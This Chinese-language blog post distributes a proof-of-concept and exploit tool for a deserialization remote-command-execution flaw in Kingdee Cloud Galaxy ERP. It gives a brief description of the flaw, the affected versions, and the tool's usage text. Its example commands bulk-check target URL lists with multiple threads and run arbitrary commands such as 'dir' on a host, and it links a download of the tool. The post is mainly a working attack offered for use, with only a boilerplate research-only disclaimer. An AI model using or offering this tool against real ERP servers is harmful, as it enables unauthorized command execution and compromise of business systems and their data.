探索网络安全新技术
攀登黑客技术最高峰

金蝶云星空 Kingdee Erp Unserialize RCE POC&EXP

漏洞介绍

由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。

影响范围

6.x版本:低于6.2.1012.4
7.x版本:7.0.352.16 至 7.7.0.202111
8.x版本:8.0.0.202205 至 8.1.0.20221110

使用方法

usage: Kingdee-erp-Unserialize-RCE.py [-h] [-u URL] [--check] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT]
                                      [-p PROXY] [--cmd CMD]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target url(e.g. http://127.0.0.1)
  --check               Check if vulnerable
  -f FILE, --file FILE  Target file(e.g. url.txt)
  -t THREAD, --thread THREAD
                        Number of thread (default 5)
  -T TIMEOUT, --timeout TIMEOUT
                        Request timeout (default 3)
  -o OUTPUT, --output OUTPUT
                        Vuln url output file (e.g. result.txt)
  -p PROXY, --proxy PROXY
                        Request Proxy (e.g http://127.0.0.1:8080)
  --cmd CMD             execute cmd (e.g. whoami)```

POC

python .\Kingdee-erp-Unserialize-RCE.py -f .\url.txt --check -t 10

金蝶云星空 Kingdee Erp Unserialize RCE POC&EXP-威武网安

Exp

python .\Kingdee-erp-Unserialize-RCE.py -u http://host --cmd 'dir'

金蝶云星空 Kingdee Erp Unserialize RCE POC&EXP-威武网安

漏洞POC&EXP下载

Kingdee-erp-Unserialize-RCE

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《金蝶云星空 Kingdee Erp Unserialize RCE POC&EXP》
文章链接:https://www.wevul.com/1731.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册